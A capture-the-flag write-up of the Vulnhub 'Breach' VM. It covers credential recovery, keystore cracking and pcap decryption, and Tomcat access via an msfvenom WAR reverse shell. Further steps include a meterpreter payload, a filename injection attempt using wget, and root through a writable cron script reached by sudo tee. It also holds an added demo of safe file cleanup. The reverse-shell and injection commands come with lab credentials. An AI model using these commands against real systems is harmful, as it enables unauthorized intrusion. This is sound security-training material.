Breach

First we start with an nmap scan, but it took far too long to enumerate the host, so I tried browsing to the IP instead and found a website there. I then started nikto and dirb against it.

Decoding this string from base64:

cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh

gives us

pgibbons:damnitfeel$goodtobeagang$ta

TODO: where is the pcap located on the website?

From checking the source code of the web application I found a strange string that looked like base64; it decoded to a username and password that let me log in to ImpressCMS.

When I found the keystore, I downloaded a tool to brute-force its password, because I needed the private key in a different format to be able to import it into Wireshark and decrypt the pcap.

https://github.com/bes/KeystoreBrute

While this was running, I tried to be smart about it and ran strings on the keystore file, which revealed the word "tomcat". I tried it as the password and it worked!

After finding that the password is tomcat, convert the JKS keystore to PKCS12 (replace <keystore> with the path of the keystore file found on the server):

keytool -importkeystore -srckeystore <keystore> -srcstoretype JKS -destkeystore keystore.p12 -deststoretype PKCS12

Export the private key from the p12, then strip the passphrase so Wireshark can load it:

openssl pkcs12 -in keystore.p12 -nocerts -out privatekey.pem
openssl rsa -in privatekey.pem -out keyout.pem

With keyout.pem loaded as an RSA key in Wireshark, the pcap decrypts.

The decrypted traffic contains an Authorization: Basic header with the credentials
tomcat:Tt\5D8F(#!*u=G)4m7zB

After searching a LONG time for how to connect to the Tomcat service (Firefox didn't work, and neither did netcat), I found out you can do it with openssl:

openssl s_client -connect 192.168.110.140:8443
After debugging openssl for hours I decided to try a browser other than Firefox, and I was able to reach the Tomcat server with Edge!

We can log in with the credentials found in the pcap.

Because we are admin on Tomcat, we can upload a malicious WAR file:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.110 LPORT=443 -f war -o /root/Dropbox/Vulnhub/Breach/shell.war
jar -xvf shell.war # to see name of jsp to call

inflated: zhawsspalj.jsp
nc -lvp 443
https://192.168.110.140:8443/shell/zhawsspalj.jsp

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.110.110 LPORT=443 -f elf -o breachmeter.elf

While enumerating the system I found there is no root password for MySQL, so I dumped all the databases and found the MD5 hash for the user milton.

Submitting this hash to CrackStation revealed that the password is thelaststraw.

Checking the logs on this server revealed a root cron job:
Jul 5 06:39:01 Breach CRON[2985]: (root) CMD (/usr/share/cleanup/tidyup.sh)

I tried to inject a bash command into the script, because I control the names of the files it deletes, and found a way to keep it from deleting my file: the script doesn't handle spaces.
I tried injecting a command with a filename like a&&wget 192.168.110.110, so that the command passed to the shell would be
rm -rf swingline/a&&wget 192.168.110.110, which would execute the command.
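The failure mode described above, as an added example that is neither the VM's tidyup.sh nor the writeup's code: a cleanup loop that word-splits file names, beside a hardened version, both run over constructed hostile names in a scratch directory. Neither version executes shell metacharacters embedded in a name, which matches the writeup's finding that the && injection did not fire.

```shell
#!/bin/sh
# Added example (not the Breach author's or VM's script). Directory and file
# names below are constructed for the demo.

# Fragile pattern: iterating over the output of ls. A name containing a space
# becomes two arguments, so "a b" is never removed. Metacharacters such as &&
# are NOT executed: the shell finished parsing the command line before the
# variable was expanded, so they are just characters in a path that does not exist.
fragile_cleanup() {
    dir=$1
    for f in $(ls "$dir"); do
        rm -rf "$dir"/$f   # unquoted $f: splits on whitespace
    done
}

# Hardened pattern: let find enumerate and delete. No re-parsing of names by
# the shell, no word splitting, and names starting with '-' cannot become flags.
safe_cleanup() {
    find "$1" -mindepth 1 -delete
}

# Populate a scratch directory with hostile-looking names, run the given
# cleanup function on it, and return how many entries survived.
leftovers_after() {
    cleaner=$1
    dir=$(mktemp -d)
    : > "$dir/plain"
    : > "$dir/a b"              # space: splits under the fragile loop
    : > "$dir/a&&touch pwned"   # metacharacters in a name
    : > "$dir/-rf"              # leading dash
    mkdir "$dir/sub" && : > "$dir/sub/nested"
    "$cleaner" "$dir"
    n=$(find "$dir" -mindepth 1 | wc -l)
    rm -rf "$dir"
    echo $((n + 0))
}

# fragile_cleanup leaves "a b" and "a&&touch pwned" behind (2 entries);
# safe_cleanup leaves nothing (0).
```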

I banged my head for about two days trying to exploit via this method.
I found something useful on the internet about how to inject arguments without spaces:
{ls,-larth}
Even this didn't work, so I did what I had learned best while doing my OSCP: Try Harder! (If you are stuck somewhere, restart your enumeration from scratch.)
While restarting my enumeration I came across a comment in one of the website's images while running exiftool on it.

It had the comment "coffeestains".
From my earlier enumeration I knew there was another user on the system who didn't seem to interact with it (no trace of him in the logs and nothing in his home directory): blumbergh. I had already tried some basic passwords on the account, but this time I tried with the new information.

su blumbergh // coffeestains

I was in!

I suspected he was the server administrator, because he wouldn't need to write anything in his home directory if he could become root.

sudo -l
User blumbergh may run the following commands on Breach:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh

Okay, we don't have full sudo privileges, but we can overwrite tidyup.sh, which root runs from cron!

cat /tmp/tidyup.sh | sudo tee /usr/share/cleanup/tidyup.sh
From now on we just wait for a connection to our Metasploit handler:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp

We then get a shell as root! Finally 🙂

root@Breach:/root# cat .flag.txt
———————————————————————————–

______ _ __ _____ _____ _ _____ _
| ___ \ | | / | | _ | |_ _| | | ___| | |
| |_/ /_ __ ___ __ _ ___| |__ `| | | |/' |______| | | |__ ___| |__ _ __ __| |
| ___ \ '__/ _ \/ _` |/ __| '_ \ | | | /| |______| | | '_ \ / _ \ __| '_ \ / _` |
| |_/ / | | __/ (_| | (__| | | || |_\ |_/ / | | | | | | __/ |__| | | | (_| |
\____/|_| \___|\__,_|\___|_| |_\___(_)___/ \_/ |_| |_|\___\____/_| |_|\__,_|

———————————————————————————–
Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!

Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.
